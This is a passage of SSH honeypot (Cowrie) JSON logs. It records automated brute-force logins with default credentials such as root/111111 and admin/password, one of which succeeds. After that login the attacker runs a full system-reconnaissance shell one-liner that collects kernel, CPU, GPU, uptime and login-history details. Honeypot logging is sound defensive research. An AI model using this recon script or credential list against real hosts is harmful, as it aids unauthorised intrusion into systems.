2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.116992Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.117460Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.118782Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.120402Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.121007Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.121726Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.122953Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.123699Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.124570Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.125166Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.125695Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.126181Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.367565Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.368532Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:26:22.369396Z","src_ip":"196.251.115.108","session":"63886070a17f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":40618,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb21fb1dfc87","protocol":"ssh","message":"New connection: 196.251.115.108:40618 (1.2.3.4:22) [session: bb21fb1dfc87]","sensor":"my-vps","timestamp":"2025-08-24T22:27:09.821806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:27:10.085806Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:27:10.086595Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.059631Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:27:13.975811Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.976532Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.976974Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.977980Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.978876Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.979668Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.980407Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.981435Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.982001Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.982714Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.983305Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.983853Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:27:13.984416Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:27:14.340702Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:27:14.342026Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:27:14.343054Z","src_ip":"196.251.115.108","session":"bb21fb1dfc87"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":52788,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e45b6fb07ca","protocol":"ssh","message":"New connection: 196.251.115.108:52788 (1.2.3.4:22) [session: 8e45b6fb07ca]","sensor":"my-vps","timestamp":"2025-08-24T22:27:59.623607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:27:59.994614Z","src_ip":"196.251.115.108","session":"8e45b6fb07ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:27:59.995672Z","src_ip":"196.251.115.108","session":"8e45b6fb07ca"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-24T22:28:03.750501Z","src_ip":"196.251.115.108","session":"8e45b6fb07ca"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:28:04.977625Z","src_ip":"196.251.115.108","session":"8e45b6fb07ca"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":38468,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0f4938a0a9f","protocol":"ssh","message":"New connection: 196.251.115.108:38468 (1.2.3.4:22) [session: e0f4938a0a9f]","sensor":"my-vps","timestamp":"2025-08-24T22:28:50.577506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:28:51.144498Z","src_ip":"196.251.115.108","session":"e0f4938a0a9f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:28:51.145683Z","src_ip":"196.251.115.108","session":"e0f4938a0a9f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-24T22:28:54.677527Z","src_ip":"196.251.115.108","session":"e0f4938a0a9f"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:28:55.787281Z","src_ip":"196.251.115.108","session":"e0f4938a0a9f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61852,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fe5d4aadd41","protocol":"ssh","message":"New connection: 217.72.205.35:61852 (1.2.3.4:22) [session: 7fe5d4aadd41]","sensor":"my-vps","timestamp":"2025-08-24T22:29:02.742258Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:29:02.744152Z","src_ip":"217.72.205.35","session":"7fe5d4aadd41"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":58400,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b6bdf8ab968","protocol":"ssh","message":"New connection: 196.251.115.108:58400 (1.2.3.4:22) [session: 1b6bdf8ab968]","sensor":"my-vps","timestamp":"2025-08-24T22:29:41.757406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:29:42.393645Z","src_ip":"196.251.115.108","session":"1b6bdf8ab968"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:29:42.394789Z","src_ip":"196.251.115.108","session":"1b6bdf8ab968"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-24T22:29:45.774243Z","src_ip":"196.251.115.108","session":"1b6bdf8ab968"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:29:46.931277Z","src_ip":"196.251.115.108","session":"1b6bdf8ab968"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":33378,"dst_ip":"1.2.3.4","dst_port":22,"session":"25bf22cd6b53","protocol":"ssh","message":"New connection: 196.251.115.108:33378 (1.2.3.4:22) [session: 25bf22cd6b53]","sensor":"my-vps","timestamp":"2025-08-24T22:30:31.270353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:30:31.879750Z","src_ip":"196.251.115.108","session":"25bf22cd6b53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:30:31.880520Z","src_ip":"196.251.115.108","session":"25bf22cd6b53"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-24T22:30:35.529831Z","src_ip":"196.251.115.108","session":"25bf22cd6b53"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:30:36.743449Z","src_ip":"196.251.115.108","session":"25bf22cd6b53"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":42674,"dst_ip":"1.2.3.4","dst_port":22,"session":"99b6c576e982","protocol":"ssh","message":"New connection: 196.251.115.108:42674 (1.2.3.4:22) [session: 99b6c576e982]","sensor":"my-vps","timestamp":"2025-08-24T22:31:22.238429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:31:22.566615Z","src_ip":"196.251.115.108","session":"99b6c576e982"}
